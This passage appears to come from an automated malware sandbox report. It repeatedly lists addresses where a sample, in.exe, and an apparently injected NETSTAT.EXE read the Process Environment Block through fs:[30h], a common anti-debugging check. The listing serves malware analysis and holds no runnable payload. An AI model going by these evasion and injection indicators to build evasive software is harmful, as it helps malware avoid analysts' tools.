          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0175FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01778ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0175FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9FD9B mov eax, dword ptr fs:[00000030h]
